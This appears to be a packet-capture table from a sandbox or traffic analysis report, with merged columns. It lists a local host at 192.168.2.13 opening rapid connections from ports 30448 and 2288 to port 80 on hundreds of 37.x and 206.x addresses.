                                          Nov 7, 2024 11:57:58.421591997 CET3044880192.168.2.1337.182.113.108
                                          Nov 7, 2024 11:57:58.421600103 CET3044880192.168.2.1337.112.114.4
                                          Nov 7, 2024 11:57:58.421617031 CET3044880192.168.2.1337.77.41.111
                                          Nov 7, 2024 11:57:58.421617031 CET3044880192.168.2.1337.247.127.220
                                          Nov 7, 2024 11:57:58.421632051 CET3044880192.168.2.1337.3.78.31
                                          Nov 7, 2024 11:57:58.421668053 CET228880192.168.2.13206.26.67.123
                                          Nov 7, 2024 11:57:58.421670914 CET228880192.168.2.13206.232.16.245
                                          Nov 7, 2024 11:57:58.421678066 CET228880192.168.2.13206.73.217.244
                                          Nov 7, 2024 11:57:58.421695948 CET228880192.168.2.13206.66.65.102
                                          Nov 7, 2024 11:57:58.421708107 CET228880192.168.2.13206.97.181.42
                                          Nov 7, 2024 11:57:58.421717882 CET228880192.168.2.13206.16.201.132
                                          Nov 7, 2024 11:57:58.421745062 CET3044880192.168.2.1337.55.8.173
                                          Nov 7, 2024 11:57:58.421751976 CET3044880192.168.2.1337.68.177.161
                                          Nov 7, 2024 11:57:58.421770096 CET3044880192.168.2.1337.81.164.0
                                          Nov 7, 2024 11:57:58.421811104 CET228880192.168.2.13206.44.64.100
                                          Nov 7, 2024 11:57:58.421817064 CET3044880192.168.2.1337.235.30.141
                                          Nov 7, 2024 11:57:58.421819925 CET228880192.168.2.13206.93.77.161
                                          Nov 7, 2024 11:57:58.421845913 CET228880192.168.2.13206.142.102.63
                                          Nov 7, 2024 11:57:58.421845913 CET228880192.168.2.13206.104.106.87
                                          Nov 7, 2024 11:57:58.421849012 CET228880192.168.2.13206.197.126.89
                                          Nov 7, 2024 11:57:58.421849012 CET228880192.168.2.13206.240.141.16
                                          Nov 7, 2024 11:57:58.421849966 CET228880192.168.2.13206.219.207.169
                                          Nov 7, 2024 11:57:58.421850920 CET228880192.168.2.13206.184.40.24
                                          Nov 7, 2024 11:57:58.421901941 CET3044880192.168.2.1337.201.110.220
                                          Nov 7, 2024 11:57:58.421912909 CET3044880192.168.2.1337.58.104.26
                                          Nov 7, 2024 11:57:58.421912909 CET3044880192.168.2.1337.108.66.100
                                          Nov 7, 2024 11:57:58.421921015 CET3044880192.168.2.1337.204.9.26
                                          Nov 7, 2024 11:57:58.421967030 CET228880192.168.2.13206.192.141.12
                                          Nov 7, 2024 11:57:58.421966076 CET228880192.168.2.13206.82.117.210
                                          Nov 7, 2024 11:57:58.421979904 CET228880192.168.2.13206.127.80.111
                                          Nov 7, 2024 11:57:58.421994925 CET228880192.168.2.13206.88.35.41
                                          Nov 7, 2024 11:57:58.421994925 CET228880192.168.2.13206.130.134.180
                                          Nov 7, 2024 11:57:58.422013044 CET228880192.168.2.13206.36.236.54
                                          Nov 7, 2024 11:57:58.422013998 CET228880192.168.2.13206.92.156.246
                                          Nov 7, 2024 11:57:58.422049046 CET3044880192.168.2.1337.245.67.90
                                          Nov 7, 2024 11:57:58.422064066 CET3044880192.168.2.1337.149.140.151
                                          Nov 7, 2024 11:57:58.422076941 CET3044880192.168.2.1337.128.218.124
                                          Nov 7, 2024 11:57:58.422081947 CET3044880192.168.2.1337.55.179.198
                                          Nov 7, 2024 11:57:58.422089100 CET3044880192.168.2.1337.185.38.207
                                          Nov 7, 2024 11:57:58.422128916 CET228880192.168.2.13206.173.168.213
                                          Nov 7, 2024 11:57:58.422135115 CET228880192.168.2.13206.88.17.102
                                          Nov 7, 2024 11:57:58.422153950 CET228880192.168.2.13206.199.193.194
                                          Nov 7, 2024 11:57:58.422158003 CET228880192.168.2.13206.80.76.185
                                          Nov 7, 2024 11:57:58.422209024 CET3044880192.168.2.1337.177.6.154
                                          Nov 7, 2024 11:57:58.422209024 CET3044880192.168.2.1337.92.125.146
                                          Nov 7, 2024 11:57:58.422209024 CET3044880192.168.2.1337.251.115.125
                                          Nov 7, 2024 11:57:58.422215939 CET3044880192.168.2.1337.247.234.22
                                          Nov 7, 2024 11:57:58.422264099 CET3044880192.168.2.1337.62.130.130
                                          Nov 7, 2024 11:57:58.422275066 CET3044880192.168.2.1337.164.213.233
                                          Nov 7, 2024 11:57:58.422276020 CET3044880192.168.2.1337.84.83.84
                                          Nov 7, 2024 11:57:58.422287941 CET3044880192.168.2.1337.44.91.191
                                          Nov 7, 2024 11:57:58.422307014 CET3044880192.168.2.1337.45.140.228
                                          Nov 7, 2024 11:57:58.422307014 CET3044880192.168.2.1337.103.5.52
                                          Nov 7, 2024 11:57:58.422348976 CET228880192.168.2.13206.150.240.135
                                          Nov 7, 2024 11:57:58.422348976 CET228880192.168.2.13206.162.210.185
                                          Nov 7, 2024 11:57:58.422364950 CET228880192.168.2.13206.220.255.233
                                          Nov 7, 2024 11:57:58.422369957 CET228880192.168.2.13206.154.143.134
                                          Nov 7, 2024 11:57:58.422385931 CET228880192.168.2.13206.115.207.173
                                          Nov 7, 2024 11:57:58.422389030 CET228880192.168.2.13206.2.145.211
                                          Nov 7, 2024 11:57:58.422395945 CET228880192.168.2.13206.70.44.142
                                          Nov 7, 2024 11:57:58.422430992 CET3044880192.168.2.1337.232.82.216
                                          Nov 7, 2024 11:57:58.422441006 CET3044880192.168.2.1337.15.122.97
                                          Nov 7, 2024 11:57:58.422451019 CET3044880192.168.2.1337.54.129.97
                                          Nov 7, 2024 11:57:58.422454119 CET3044880192.168.2.1337.126.6.204
                                          Nov 7, 2024 11:57:58.422471046 CET3044880192.168.2.1337.182.2.126
                                          Nov 7, 2024 11:57:58.422473907 CET3044880192.168.2.1337.248.205.111
                                          Nov 7, 2024 11:57:58.422516108 CET228880192.168.2.13206.221.24.80
                                          Nov 7, 2024 11:57:58.422525883 CET228880192.168.2.13206.3.125.178
                                          Nov 7, 2024 11:57:58.422533035 CET228880192.168.2.13206.129.59.39
                                          Nov 7, 2024 11:57:58.422533989 CET228880192.168.2.13206.51.233.104
                                          Nov 7, 2024 11:57:58.422549963 CET228880192.168.2.13206.43.119.238
                                          Nov 7, 2024 11:57:58.422600031 CET3044880192.168.2.1337.30.242.126
                                          Nov 7, 2024 11:57:58.422600985 CET3044880192.168.2.1337.76.27.249
                                          Nov 7, 2024 11:57:58.422621965 CET3044880192.168.2.1337.55.255.236
                                          Nov 7, 2024 11:57:58.422625065 CET3044880192.168.2.1337.9.204.179
                                          Nov 7, 2024 11:57:58.422637939 CET228880192.168.2.13206.163.43.66
                                          Nov 7, 2024 11:57:58.422667980 CET228880192.168.2.13206.227.220.232
                                          Nov 7, 2024 11:57:58.422683001 CET228880192.168.2.13206.95.108.229
                                          Nov 7, 2024 11:57:58.422693968 CET228880192.168.2.13206.66.93.113
                                          Nov 7, 2024 11:57:58.422702074 CET228880192.168.2.13206.117.16.154
                                          Nov 7, 2024 11:57:58.422739029 CET3044880192.168.2.1337.207.67.74
                                          Nov 7, 2024 11:57:58.422750950 CET3044880192.168.2.1337.116.220.226
                                          Nov 7, 2024 11:57:58.422760963 CET3044880192.168.2.1337.49.86.100
                                          Nov 7, 2024 11:57:58.422775984 CET3044880192.168.2.1337.91.55.41
                                          Nov 7, 2024 11:57:58.422815084 CET228880192.168.2.13206.226.216.221
                                          Nov 7, 2024 11:57:58.422825098 CET228880192.168.2.13206.165.222.197
                                          Nov 7, 2024 11:57:58.422827005 CET228880192.168.2.13206.110.212.244
                                          Nov 7, 2024 11:57:58.422841072 CET228880192.168.2.13206.67.85.218
                                          Nov 7, 2024 11:57:58.422852039 CET228880192.168.2.13206.27.181.94
                                          Nov 7, 2024 11:57:58.422892094 CET3044880192.168.2.1337.15.37.2
                                          Nov 7, 2024 11:57:58.422909021 CET3044880192.168.2.1337.37.245.83
                                          Nov 7, 2024 11:57:58.422910929 CET3044880192.168.2.1337.247.90.239
                                          Nov 7, 2024 11:57:58.422916889 CET3044880192.168.2.1337.244.161.28
                                          Nov 7, 2024 11:57:58.422930956 CET3044880192.168.2.1337.227.175.173
                                          Nov 7, 2024 11:57:58.422970057 CET228880192.168.2.13206.119.70.121
                                          Nov 7, 2024 11:57:58.422979116 CET228880192.168.2.13206.13.102.159
                                          Nov 7, 2024 11:57:58.422983885 CET228880192.168.2.13206.8.184.49
                                          Nov 7, 2024 11:57:58.422992945 CET228880192.168.2.13206.25.87.4
                                          Nov 7, 2024 11:57:58.423028946 CET228880192.168.2.13206.144.253.210
                                          Nov 7, 2024 11:57:58.423039913 CET3044880192.168.2.1337.75.150.114
                                          Nov 7, 2024 11:57:58.423048019 CET3044880192.168.2.1337.168.226.181
                                          Nov 7, 2024 11:57:58.423059940 CET3044880192.168.2.1337.168.186.60
                                          Nov 7, 2024 11:57:58.423064947 CET3044880192.168.2.1337.220.39.222
                                          Nov 7, 2024 11:57:58.423078060 CET3044880192.168.2.1337.70.139.81
                                          Nov 7, 2024 11:57:58.423113108 CET228880192.168.2.13206.25.8.99
                                          Nov 7, 2024 11:57:58.423115969 CET228880192.168.2.13206.213.92.239
                                          Nov 7, 2024 11:57:58.423126936 CET228880192.168.2.13206.119.176.76
                                          Nov 7, 2024 11:57:58.423134089 CET228880192.168.2.13206.218.239.84
                                          Nov 7, 2024 11:57:58.423145056 CET228880192.168.2.13206.208.22.117
                                          Nov 7, 2024 11:57:58.423182964 CET3044880192.168.2.1337.32.210.193
                                          Nov 7, 2024 11:57:58.423194885 CET3044880192.168.2.1337.132.223.186
                                          Nov 7, 2024 11:57:58.423203945 CET3044880192.168.2.1337.86.159.118
                                          Nov 7, 2024 11:57:58.423218012 CET3044880192.168.2.1337.9.184.228
                                          Nov 7, 2024 11:57:58.423252106 CET228880192.168.2.13206.196.24.164
                                          Nov 7, 2024 11:57:58.423270941 CET228880192.168.2.13206.106.170.126
                                          Nov 7, 2024 11:57:58.423270941 CET228880192.168.2.13206.239.26.251
                                          Nov 7, 2024 11:57:58.423289061 CET228880192.168.2.13206.22.109.148
                                          Nov 7, 2024 11:57:58.423293114 CET228880192.168.2.13206.162.125.44
                                          Nov 7, 2024 11:57:58.423331022 CET3044880192.168.2.1337.195.202.171
                                          Nov 7, 2024 11:57:58.423343897 CET3044880192.168.2.1337.64.192.56
                                          Nov 7, 2024 11:57:58.423353910 CET3044880192.168.2.1337.131.217.138
                                          Nov 7, 2024 11:57:58.423373938 CET3044880192.168.2.1337.61.218.2
                                          Nov 7, 2024 11:57:58.423373938 CET3044880192.168.2.1337.26.137.153
                                          Nov 7, 2024 11:57:58.423420906 CET228880192.168.2.13206.13.65.157
                                          Nov 7, 2024 11:57:58.423423052 CET228880192.168.2.13206.204.120.243
                                          Nov 7, 2024 11:57:58.423428059 CET228880192.168.2.13206.253.146.51
                                          Nov 7, 2024 11:57:58.423443079 CET228880192.168.2.13206.12.22.157
                                          Nov 7, 2024 11:57:58.423443079 CET228880192.168.2.13206.66.152.247
                                          Nov 7, 2024 11:57:58.423485994 CET3044880192.168.2.1337.68.39.73
                                          Nov 7, 2024 11:57:58.423507929 CET3044880192.168.2.1337.93.142.196
                                          Nov 7, 2024 11:57:58.423518896 CET3044880192.168.2.1337.110.87.15
                                          Nov 7, 2024 11:57:58.423521042 CET3044880192.168.2.1337.101.147.117
                                          Nov 7, 2024 11:57:58.423561096 CET228880192.168.2.13206.202.96.144
                                          Nov 7, 2024 11:57:58.423563957 CET228880192.168.2.13206.111.66.254
                                          Nov 7, 2024 11:57:58.423595905 CET228880192.168.2.13206.97.154.98
                                          Nov 7, 2024 11:57:58.423595905 CET228880192.168.2.13206.125.253.215
                                          Nov 7, 2024 11:57:58.423595905 CET228880192.168.2.13206.53.75.40
                                          Nov 7, 2024 11:57:58.423624039 CET228880192.168.2.13206.72.194.32
                                          Nov 7, 2024 11:57:58.423640013 CET3044880192.168.2.1337.22.155.143
                                          Nov 7, 2024 11:57:58.423646927 CET3044880192.168.2.1337.17.44.134
                                          Nov 7, 2024 11:57:58.423651934 CET3044880192.168.2.1337.148.40.151
                                          Nov 7, 2024 11:57:58.423707008 CET228880192.168.2.13206.47.13.156
                                          Nov 7, 2024 11:57:58.423712969 CET3044880192.168.2.1337.230.102.252
                                          Nov 7, 2024 11:57:58.423712969 CET228880192.168.2.13206.158.4.198
                                          Nov 7, 2024 11:57:58.423727036 CET228880192.168.2.13206.199.191.121
                                          Nov 7, 2024 11:57:58.423732042 CET228880192.168.2.13206.132.140.177
                                          Nov 7, 2024 11:57:58.423747063 CET228880192.168.2.13206.115.230.105
                                          Nov 7, 2024 11:57:58.423774958 CET3044880192.168.2.1337.73.68.120
                                          Nov 7, 2024 11:57:58.423790932 CET3044880192.168.2.1337.140.199.167
                                          Nov 7, 2024 11:57:58.423799992 CET3044880192.168.2.1337.17.152.158
                                          Nov 7, 2024 11:57:58.423805952 CET3044880192.168.2.1337.129.8.156
                                          Nov 7, 2024 11:57:58.423846006 CET228880192.168.2.13206.73.166.11
                                          Nov 7, 2024 11:57:58.423851013 CET228880192.168.2.13206.36.139.149
                                          Nov 7, 2024 11:57:58.423861980 CET228880192.168.2.13206.9.244.136
                                          Nov 7, 2024 11:57:58.423878908 CET228880192.168.2.13206.1.214.92
                                          Nov 7, 2024 11:57:58.423890114 CET228880192.168.2.13206.211.80.134
                                          Nov 7, 2024 11:57:58.423891068 CET228880192.168.2.13206.173.14.228
                                          Nov 7, 2024 11:57:58.423926115 CET3044880192.168.2.1337.225.133.21
                                          Nov 7, 2024 11:57:58.423934937 CET3044880192.168.2.1337.206.88.72
                                          Nov 7, 2024 11:57:58.423943043 CET3044880192.168.2.1337.33.59.36
                                          Nov 7, 2024 11:57:58.423955917 CET3044880192.168.2.1337.251.126.55
                                          Nov 7, 2024 11:57:58.423955917 CET3044880192.168.2.1337.211.253.143
                                          Nov 7, 2024 11:57:58.424005985 CET228880192.168.2.13206.35.21.12
                                          Nov 7, 2024 11:57:58.424007893 CET228880192.168.2.13206.151.199.46
                                          Nov 7, 2024 11:57:58.424021006 CET228880192.168.2.13206.114.87.107
                                          Nov 7, 2024 11:57:58.424026012 CET228880192.168.2.13206.44.92.235
                                          Nov 7, 2024 11:57:58.424035072 CET228880192.168.2.13206.249.175.28
                                          Nov 7, 2024 11:57:58.424037933 CET228880192.168.2.13206.187.198.180
                                          Nov 7, 2024 11:57:58.424058914 CET228880192.168.2.13206.114.172.241
                                          Nov 7, 2024 11:57:58.424089909 CET3044880192.168.2.1337.174.33.11
                                          Nov 7, 2024 11:57:58.424103022 CET3044880192.168.2.1337.132.193.184
                                          Nov 7, 2024 11:57:58.424107075 CET3044880192.168.2.1337.40.49.102
                                          Nov 7, 2024 11:57:58.424107075 CET3044880192.168.2.1337.134.158.12
                                          Nov 7, 2024 11:57:58.424119949 CET3044880192.168.2.1337.154.109.138
                                          Nov 7, 2024 11:57:58.424129963 CET3044880192.168.2.1337.248.115.176
                                          Nov 7, 2024 11:57:58.424168110 CET228880192.168.2.13206.203.207.191
                                          Nov 7, 2024 11:57:58.424180031 CET228880192.168.2.13206.66.121.50
                                          Nov 7, 2024 11:57:58.424190998 CET228880192.168.2.13206.210.73.111
                                          Nov 7, 2024 11:57:58.424201012 CET228880192.168.2.13206.188.84.133
                                          Nov 7, 2024 11:57:58.424237013 CET3044880192.168.2.1337.28.92.129
                                          Nov 7, 2024 11:57:58.424256086 CET3044880192.168.2.1337.92.207.239
                                          Nov 7, 2024 11:57:58.424259901 CET3044880192.168.2.1337.178.48.206
                                          Nov 7, 2024 11:57:58.424259901 CET3044880192.168.2.1337.78.126.52
                                          Nov 7, 2024 11:57:58.424268961 CET3044880192.168.2.1337.132.0.165
                                          Nov 7, 2024 11:57:58.424303055 CET228880192.168.2.13206.182.121.225
                                          Nov 7, 2024 11:57:58.424316883 CET228880192.168.2.13206.231.254.137
                                          Nov 7, 2024 11:57:58.424329042 CET228880192.168.2.13206.169.57.90
                                          Nov 7, 2024 11:57:58.424329042 CET228880192.168.2.13206.95.129.222
                                          Nov 7, 2024 11:57:58.424336910 CET228880192.168.2.13206.45.168.206
                                          Nov 7, 2024 11:57:58.424390078 CET3044880192.168.2.1337.154.4.201
                                          Nov 7, 2024 11:57:58.424391985 CET3044880192.168.2.1337.81.71.224
                                          Nov 7, 2024 11:57:58.424405098 CET3044880192.168.2.1337.226.108.110
                                          Nov 7, 2024 11:57:58.424415112 CET3044880192.168.2.1337.31.205.243
                                          Nov 7, 2024 11:57:58.424417973 CET3044880192.168.2.1337.33.40.159
                                          Nov 7, 2024 11:57:58.424459934 CET228880192.168.2.13206.150.91.232
                                          Nov 7, 2024 11:57:58.424463034 CET228880192.168.2.13206.21.192.102
                                          Nov 7, 2024 11:57:58.424474001 CET228880192.168.2.13206.8.203.93
                                          Nov 7, 2024 11:57:58.424475908 CET228880192.168.2.13206.222.250.187
                                          Nov 7, 2024 11:57:58.424490929 CET228880192.168.2.13206.15.178.178
                                          Nov 7, 2024 11:57:58.424493074 CET228880192.168.2.13206.89.1.127
                                          Nov 7, 2024 11:57:58.424544096 CET3044880192.168.2.1337.206.237.4
                                          Nov 7, 2024 11:57:58.424562931 CET3044880192.168.2.1337.215.221.221
                                          Nov 7, 2024 11:57:58.424570084 CET3044880192.168.2.1337.250.222.249
                                          Nov 7, 2024 11:57:58.424570084 CET3044880192.168.2.1337.127.127.104
                                          Nov 7, 2024 11:57:58.424591064 CET3044880192.168.2.1337.15.156.191
                                          Nov 7, 2024 11:57:58.424604893 CET228880192.168.2.13206.165.145.52
                                          Nov 7, 2024 11:57:58.424607992 CET228880192.168.2.13206.14.17.93
                                          Nov 7, 2024 11:57:58.424621105 CET228880192.168.2.13206.238.228.169
                                          Nov 7, 2024 11:57:58.424643993 CET228880192.168.2.13206.139.35.28
                                          Nov 7, 2024 11:57:58.424644947 CET228880192.168.2.13206.87.229.89
                                          Nov 7, 2024 11:57:58.424645901 CET228880192.168.2.13206.31.35.34
                                          Nov 7, 2024 11:57:58.424680948 CET3044880192.168.2.1337.153.21.166
                                          Nov 7, 2024 11:57:58.424681902 CET3044880192.168.2.1337.54.72.63
                                          Nov 7, 2024 11:57:58.424698114 CET3044880192.168.2.1337.19.65.54
                                          Nov 7, 2024 11:57:58.424699068 CET3044880192.168.2.1337.50.142.28
                                          Nov 7, 2024 11:57:58.424709082 CET3044880192.168.2.1337.54.212.139
                                          Nov 7, 2024 11:57:58.424720049 CET3044880192.168.2.1337.60.227.207
                                          Nov 7, 2024 11:57:58.424734116 CET3044880192.168.2.1337.197.229.61
                                          Nov 7, 2024 11:57:58.424750090 CET3044880192.168.2.1337.236.99.4
                                          Nov 7, 2024 11:57:58.424777031 CET228880192.168.2.13206.106.54.73
                                          Nov 7, 2024 11:57:58.424783945 CET228880192.168.2.13206.188.49.53
                                          Nov 7, 2024 11:57:58.424791098 CET228880192.168.2.13206.226.216.239
                                          Nov 7, 2024 11:57:58.424796104 CET228880192.168.2.13206.109.33.236
                                          Nov 7, 2024 11:57:58.424813986 CET228880192.168.2.13206.144.145.249
                                          Nov 7, 2024 11:57:58.424845934 CET3044880192.168.2.1337.255.12.105
                                          Nov 7, 2024 11:57:58.424864054 CET3044880192.168.2.1337.76.253.223
                                          Nov 7, 2024 11:57:58.424866915 CET3044880192.168.2.1337.225.180.48
                                          Nov 7, 2024 11:57:58.424875975 CET3044880192.168.2.1337.165.101.44
                                          Nov 7, 2024 11:57:58.424880028 CET3044880192.168.2.1337.59.143.236
                                          Nov 7, 2024 11:57:58.424896955 CET3044880192.168.2.1337.54.245.94
                                          Nov 7, 2024 11:57:58.424901009 CET3044880192.168.2.1337.103.125.17
                                          Nov 7, 2024 11:57:58.424930096 CET228880192.168.2.13206.63.50.56
                                          Nov 7, 2024 11:57:58.424940109 CET228880192.168.2.13206.40.189.59
                                          Nov 7, 2024 11:57:58.424942970 CET228880192.168.2.13206.191.121.160
                                          Nov 7, 2024 11:57:58.424962044 CET228880192.168.2.13206.108.142.196
                                          Nov 7, 2024 11:57:58.424995899 CET3044880192.168.2.1337.200.74.62
                                          Nov 7, 2024 11:57:58.425004005 CET3044880192.168.2.1337.46.100.165
                                          Nov 7, 2024 11:57:58.425013065 CET3044880192.168.2.1337.130.79.157
                                          Nov 7, 2024 11:57:58.425024986 CET3044880192.168.2.1337.242.18.245
                                          Nov 7, 2024 11:57:58.425038099 CET3044880192.168.2.1337.220.45.131
                                          Nov 7, 2024 11:57:58.425075054 CET228880192.168.2.13206.184.59.106
                                          Nov 7, 2024 11:57:58.425075054 CET228880192.168.2.13206.25.7.195
                                          Nov 7, 2024 11:57:58.425090075 CET228880192.168.2.13206.39.21.238
                                          Nov 7, 2024 11:57:58.425115108 CET228880192.168.2.13206.180.80.156
                                          Nov 7, 2024 11:57:58.425115108 CET228880192.168.2.13206.65.77.118
                                          Nov 7, 2024 11:57:58.425122023 CET228880192.168.2.13206.203.243.56
                                          Nov 7, 2024 11:57:58.425163031 CET3044880192.168.2.1337.59.24.153
                                          Nov 7, 2024 11:57:58.425170898 CET3044880192.168.2.1337.106.63.161
                                          Nov 7, 2024 11:57:58.425179958 CET3044880192.168.2.1337.220.194.234
                                          Nov 7, 2024 11:57:58.425185919 CET3044880192.168.2.1337.214.13.25
                                          Nov 7, 2024 11:57:58.425188065 CET3044880192.168.2.1337.77.97.143
                                          Nov 7, 2024 11:57:58.425201893 CET3044880192.168.2.1337.114.206.106
                                          Nov 7, 2024 11:57:58.425208092 CET3044880192.168.2.1337.133.94.116
                                          Nov 7, 2024 11:57:58.425219059 CET3044880192.168.2.1337.254.51.125
                                          Nov 7, 2024 11:57:58.425261021 CET228880192.168.2.13206.233.238.18
                                          Nov 7, 2024 11:57:58.425263882 CET228880192.168.2.13206.193.80.98
                                          Nov 7, 2024 11:57:58.425276041 CET228880192.168.2.13206.55.177.158
                                          Nov 7, 2024 11:57:58.425287008 CET228880192.168.2.13206.189.51.107
                                          Nov 7, 2024 11:57:58.425296068 CET228880192.168.2.13206.132.139.15
                                          Nov 7, 2024 11:57:58.425352097 CET228880192.168.2.13206.96.182.0
                                          Nov 7, 2024 11:57:58.425359964 CET3044880192.168.2.1337.113.203.164
                                          Nov 7, 2024 11:57:58.425365925 CET228880192.168.2.13206.109.84.97
                                          Nov 7, 2024 11:57:58.425369978 CET3044880192.168.2.1337.241.107.156
                                          Nov 7, 2024 11:57:58.425373077 CET228880192.168.2.13206.163.231.209
                                          Nov 7, 2024 11:57:58.425384045 CET3044880192.168.2.1337.74.146.160
                                          Nov 7, 2024 11:57:58.425384998 CET3044880192.168.2.1337.102.9.88
                                          Nov 7, 2024 11:57:58.425386906 CET228880192.168.2.13206.79.128.223
                                          Nov 7, 2024 11:57:58.425400019 CET3044880192.168.2.1337.208.27.4
                                          Nov 7, 2024 11:57:58.425401926 CET3044880192.168.2.1337.40.136.176
                                          Nov 7, 2024 11:57:58.425403118 CET3044880192.168.2.1337.169.39.101
                                          Nov 7, 2024 11:57:58.425419092 CET3044880192.168.2.1337.98.40.72
                                          Nov 7, 2024 11:57:58.425420046 CET3044880192.168.2.1337.142.80.182
                                          Nov 7, 2024 11:57:58.425426960 CET228880192.168.2.13206.151.57.105
                                          Nov 7, 2024 11:57:58.425441027 CET228880192.168.2.13206.187.74.49
                                          Nov 7, 2024 11:57:58.425445080 CET3044880192.168.2.1337.133.171.227
                                          Nov 7, 2024 11:57:58.425446033 CET3044880192.168.2.1337.187.175.157
                                          Nov 7, 2024 11:57:58.425446033 CET3044880192.168.2.1337.58.12.117
                                          Nov 7, 2024 11:57:58.425448895 CET3044880192.168.2.1337.84.237.108
                                          Nov 7, 2024 11:57:58.425453901 CET3044880192.168.2.1337.10.208.108
                                          Nov 7, 2024 11:57:58.425458908 CET3044880192.168.2.1337.191.66.24
                                          Nov 7, 2024 11:57:58.425467968 CET3044880192.168.2.1337.202.224.20
                                          Nov 7, 2024 11:57:58.425467968 CET228880192.168.2.13206.121.39.200
                                          Nov 7, 2024 11:57:58.425477982 CET228880192.168.2.13206.131.228.25
                                          Nov 7, 2024 11:57:58.425478935 CET228880192.168.2.13206.53.78.67
                                          Nov 7, 2024 11:57:58.425482988 CET228880192.168.2.13206.31.140.155
                                          Nov 7, 2024 11:57:58.425488949 CET3044880192.168.2.1337.57.163.228
                                          Nov 7, 2024 11:57:58.425488949 CET3044880192.168.2.1337.23.149.70
                                          Nov 7, 2024 11:57:58.425493002 CET3044880192.168.2.1337.51.254.99
                                          Nov 7, 2024 11:57:58.425494909 CET3044880192.168.2.1337.144.253.104
                                          Nov 7, 2024 11:57:58.425503969 CET228880192.168.2.13206.168.233.183
                                          Nov 7, 2024 11:57:58.425503969 CET3044880192.168.2.1337.40.156.190
                                          Nov 7, 2024 11:57:58.425504923 CET228880192.168.2.13206.137.186.27
                                          Nov 7, 2024 11:57:58.425507069 CET3044880192.168.2.1337.214.174.128
                                          Nov 7, 2024 11:57:58.425508976 CET3044880192.168.2.1337.68.138.254
                                          Nov 7, 2024 11:57:58.425508976 CET3044880192.168.2.1337.124.175.128
                                          Nov 7, 2024 11:57:58.425515890 CET3044880192.168.2.1337.9.18.217
                                          Nov 7, 2024 11:57:58.425522089 CET3044880192.168.2.1337.52.17.72
                                          Nov 7, 2024 11:57:58.425523996 CET228880192.168.2.13206.169.121.184
                                          Nov 7, 2024 11:57:58.425532103 CET3044880192.168.2.1337.55.32.224
                                          Nov 7, 2024 11:57:58.425540924 CET3044880192.168.2.1337.254.215.80
                                          Nov 7, 2024 11:57:58.425554037 CET3044880192.168.2.1337.213.102.178
                                          Nov 7, 2024 11:57:58.425554037 CET3044880192.168.2.1337.211.120.49
                                          Nov 7, 2024 11:57:58.425564051 CET228880192.168.2.13206.225.97.157
                                          Nov 7, 2024 11:57:58.425569057 CET3044880192.168.2.1337.170.146.78
                                          Nov 7, 2024 11:57:58.425573111 CET3044880192.168.2.1337.77.16.231
                                          Nov 7, 2024 11:57:58.425580978 CET3044880192.168.2.1337.152.5.7
                                          Nov 7, 2024 11:57:58.425581932 CET3044880192.168.2.1337.126.47.1
                                          Nov 7, 2024 11:57:58.425585032 CET228880192.168.2.13206.2.159.246
                                          Nov 7, 2024 11:57:58.425589085 CET3044880192.168.2.1337.200.182.179
                                          Nov 7, 2024 11:57:58.425599098 CET3044880192.168.2.1337.0.99.237
                                          Nov 7, 2024 11:57:58.425599098 CET3044880192.168.2.1337.205.229.3
                                          Nov 7, 2024 11:57:58.425600052 CET3044880192.168.2.1337.96.224.147
                                          Nov 7, 2024 11:57:58.425601006 CET3044880192.168.2.1337.100.243.141
                                          Nov 7, 2024 11:57:58.425606966 CET3044880192.168.2.1337.99.66.5
                                          Nov 7, 2024 11:57:58.425611973 CET3044880192.168.2.1337.53.248.42
                                          Nov 7, 2024 11:57:58.425625086 CET3044880192.168.2.1337.209.128.81
                                          Nov 7, 2024 11:57:58.425633907 CET3044880192.168.2.1337.39.57.108
                                          Nov 7, 2024 11:57:58.425633907 CET3044880192.168.2.1337.37.78.60
                                          Nov 7, 2024 11:57:58.425642014 CET3044880192.168.2.1337.115.171.0
                                          Nov 7, 2024 11:57:58.425648928 CET3044880192.168.2.1337.210.76.15
                                          Nov 7, 2024 11:57:58.425651073 CET228880192.168.2.13206.98.196.174
                                          Nov 7, 2024 11:57:58.425652981 CET228880192.168.2.13206.8.248.169
                                          Nov 7, 2024 11:57:58.425657034 CET3044880192.168.2.1337.215.248.167
                                          Nov 7, 2024 11:57:58.425657034 CET228880192.168.2.13206.50.54.250
                                          Nov 7, 2024 11:57:58.425661087 CET3044880192.168.2.1337.87.37.55
                                          Nov 7, 2024 11:57:58.425669909 CET3044880192.168.2.1337.129.195.59
                                          Nov 7, 2024 11:57:58.425672054 CET3044880192.168.2.1337.88.13.93
                                          Nov 7, 2024 11:57:58.425678015 CET228880192.168.2.13206.150.58.238
                                          Nov 7, 2024 11:57:58.425678015 CET3044880192.168.2.1337.238.81.169
                                          Nov 7, 2024 11:57:58.425678015 CET3044880192.168.2.1337.137.150.234
                                          Nov 7, 2024 11:57:58.425692081 CET3044880192.168.2.1337.198.197.52
                                          Nov 7, 2024 11:57:58.425704956 CET3044880192.168.2.1337.122.43.215
                                          Nov 7, 2024 11:57:58.425709963 CET3044880192.168.2.1337.212.97.113
                                          Nov 7, 2024 11:57:58.425710917 CET3044880192.168.2.1337.199.212.63
                                          Nov 7, 2024 11:57:58.425710917 CET3044880192.168.2.1337.231.64.1
                                          Nov 7, 2024 11:57:58.425729036 CET3044880192.168.2.1337.101.11.113
                                          Nov 7, 2024 11:57:58.425729990 CET228880192.168.2.13206.238.167.138
                                          Nov 7, 2024 11:57:58.425733089 CET3044880192.168.2.1337.36.115.38
                                          Nov 7, 2024 11:57:58.425733089 CET228880192.168.2.13206.4.149.65
                                          Nov 7, 2024 11:57:58.425734043 CET3044880192.168.2.1337.93.141.255
                                          Nov 7, 2024 11:57:58.425734997 CET3044880192.168.2.1337.93.1.135
                                          Nov 7, 2024 11:57:58.425748110 CET228880192.168.2.13206.215.63.126
                                          Nov 7, 2024 11:57:58.425750971 CET3044880192.168.2.1337.193.222.105
                                          Nov 7, 2024 11:57:58.425750971 CET3044880192.168.2.1337.118.114.94
                                          Nov 7, 2024 11:57:58.425753117 CET3044880192.168.2.1337.89.6.116
                                          Nov 7, 2024 11:57:58.425753117 CET228880192.168.2.13206.116.170.193
                                          Nov 7, 2024 11:57:58.425757885 CET228880192.168.2.13206.36.104.95
                                          Nov 7, 2024 11:57:58.425759077 CET3044880192.168.2.1337.115.246.54
                                          Nov 7, 2024 11:57:58.425761938 CET3044880192.168.2.1337.15.203.173
                                          Nov 7, 2024 11:57:58.425774097 CET3044880192.168.2.1337.94.203.133
                                          Nov 7, 2024 11:57:58.425776005 CET3044880192.168.2.1337.85.183.50
                                          Nov 7, 2024 11:57:58.425792933 CET3044880192.168.2.1337.145.11.10
